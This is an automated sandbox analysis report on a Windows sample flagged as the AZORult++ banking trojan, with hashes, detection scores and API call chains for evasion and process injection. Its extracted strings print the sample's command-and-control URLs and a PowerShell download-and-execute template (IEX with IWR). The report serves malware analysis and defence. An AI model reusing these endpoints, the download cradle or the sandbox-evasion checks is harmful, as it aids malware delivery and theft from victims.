Windows Analysis Report
SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Overview

General Information

Sample name: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe
Analysis ID: 1426755
MD5: 69b4504419872fee9bc3bc996b88eb4b
SHA1: f87cd6cc91070bb3331fe6c6e25ac84b840f0c50
SHA256: 0a06c8a177765ec2e723da7b9d406eb68c43541a6740ffa395a7297ed94e0d73
Tags: exe

Detection

AZORult++
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected AZORult++ Trojan
Multi AV Scanner detection for submitted file
Contains functionality to detect virtual machines
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Found evasive API chain (may stop execution after checking locale)
Found evasive API chain (may stop execution after checking mutex)
Machine Learning detection for sample
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Program does not show much activity (idle)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider

Classification

AV Detection

Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Avira: detected
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe ReversingLabs: Detection: 83%
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Virustotal: Detection: 80%
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Code function: 0_2_005A8306 Sleep,Sleep,Sleep,InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW, 0_2_005A8306
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Code function: 0_2_005A8330 InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW,ExitProcess, 0_2_005A8330
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Code function: 0_2_005A8F20 CryptGenRandom,HeapFree,GetProcessHeap,HeapFree,wsprintfA,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 0_2_005A8F20
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Code function: 0_2_00FB8ACD FindFirstFileExW, 0_2_00FB8ACD
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Code function: 0_2_005A8610 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,GlobalMemoryStatusEx,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW, 0_2_005A8610
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Code function: 0_2_005A6690 HeapFree,ObtainUserAgentString,MultiByteToWideChar,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,InternetOpenW,InternetSetOptionW,InternetConnectW,HttpOpenRequestW,InternetQueryOptionW,InternetSetOptionW,HttpSendRequestW,InternetQueryDataAvailable,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,HeapFree,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 0_2_005A6690
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe String found in binary or memory: http://195.123.217.199/aahs.php
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe, 00000000.00000002.2027937445.000000000069E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe, 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp String found in binary or memory: http://195.123.217.199/aahs.php%temp%
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe String found in binary or memory: https://xpradiotwo.com/wp-content/uploads
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe, 00000000.00000002.2027937445.000000000069E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe, 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp String found in binary or memory: https://xpradiotwo.com/wp-content/uploads/c

E-Banking Fraud

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Code function: 0_2_005A8DC0 EntryPoint,GetUserDefaultLangID,ExitProcess, 0_2_005A8DC0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Code function: 0_2_005A5E60 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTempPathW,wnsprintfW,wnsprintfW,PathCombineW,CreateFileW,WriteFile,WriteFile,SetEndOfFile,SetFilePointer,wnsprintfW,RtlInitUnicodeString,RtlInitUnicodeString,RtlInitUnicodeString,GetCurrentProcess,SetFilePointer,WriteFile,FlushFileBuffers,SetEndOfFile,NtQueryInformationProcess,NtClose,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,NtClose,NtClose,NtClose,NtClose,CloseHandle, 0_2_005A5E60
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Code function: 0_2_005A5AE0 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle, 0_2_005A5AE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Code function: 0_2_00FBE87D 0_2_00FBE87D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Code function: 0_2_005A7850 0_2_005A7850
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Code function: 0_2_005A7430 0_2_005A7430
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Code function: 0_2_005A2490 0_2_005A2490
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Code function: 0_2_005A4250 0_2_005A4250
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Code function: 0_2_005A4650 0_2_005A4650
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Code function: String function: 00FB4480 appears 33 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Code function: String function: 00FB3040 appears 46 times
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine Classification label: mal88.bank.evad.winEXE@1/0@0/0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Code function: 0_2_005A6200 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle, 0_2_005A6200
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Code function: 0_2_005A6AC0 VariantInit,CoCreateInstance,SysAllocString,SysFreeString,SysFreeString,SysAllocString,SysFreeString, 0_2_005A6AC0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Command line argument: jhl46745fghb 0_2_00FB2F40
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe ReversingLabs: Detection: 83%
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Virustotal: Detection: 80%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Section loaded: sspicli.dll
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Code function: 0_2_00FB1300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect, 0_2_00FB1300

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Code function: VMWare %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxTray.exe 0_2_005A8610
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Code function: EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,GlobalMemoryStatusEx,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW, 0_2_005A8610
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe File opened / queried: C:\Windows\System32\VBoxService.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe API coverage: 9.6 %
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Code function: 0_2_00FB8ACD FindFirstFileExW, 0_2_00FB8ACD
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Code function: 0_2_005A8610 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,GlobalMemoryStatusEx,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW, 0_2_005A8610
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Binary or memory string: Hyper-V
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Binary or memory string: VMWare
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Binary or memory string: %systemroot%\System32\VBoxService.exe
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe, 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp Binary or memory string: POST%s|%s|VoYGkc5RStart%d|%sINITWindowsPowerShell\v1.0\powershell.exe -enc %S%ComSpec% /c %Skernel32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirectionShellExecuteWshell32openReleaseSeShutdownPrivilege%Shttp://195.123.217.199/aahs.php%temp%\%paths%%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exesd2.ps1sd4.ps1https://xpradiotwo.com/wp-content/uploads/c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')"Hyper-VVMWareParallels Display AdapterRed Hat QXL controller%systemroot%\System32\VBoxService.exe%systemroot%\System32\VBoxTray.exe?
Source: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Binary or memory string: %systemroot%\System32\VBoxTray.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Code function: 0_2_00FB695B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00FB695B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Code function: 0_2_00FB1300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect, 0_2_00FB1300
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Code function: 0_2_00FB1710 mov ecx, dword ptr fs:[00000030h] 0_2_00FB1710
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Code function: 0_2_00FB75A2 mov eax, dword ptr fs:[00000030h] 0_2_00FB75A2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Code function: 0_2_00FB9763 mov eax, dword ptr fs:[00000030h] 0_2_00FB9763
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Code function: 0_2_005A7640 mov eax, dword ptr fs:[00000030h] 0_2_005A7640
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Code function: 0_2_005A5E60 mov eax, dword ptr fs:[00000030h] 0_2_005A5E60
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Code function: 0_2_00FBA845 GetProcessHeap, 0_2_00FBA845
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Code function: 0_2_00FB3D4E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00FB3D4E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Code function: 0_2_00FB421C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00FB421C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Code function: 0_2_00FB43AF SetUnhandledExceptionFilter, 0_2_00FB43AF

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Code function: 0_2_005A5AE0 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle, 0_2_005A5AE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Code function: 0_2_00FB44C5 cpuid 0_2_00FB44C5
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Code function: 0_2_00FB4103 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00FB4103
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe Code function: 0_2_005A8610 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,GlobalMemoryStatusEx,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW, 0_2_005A8610
No contacted IP infos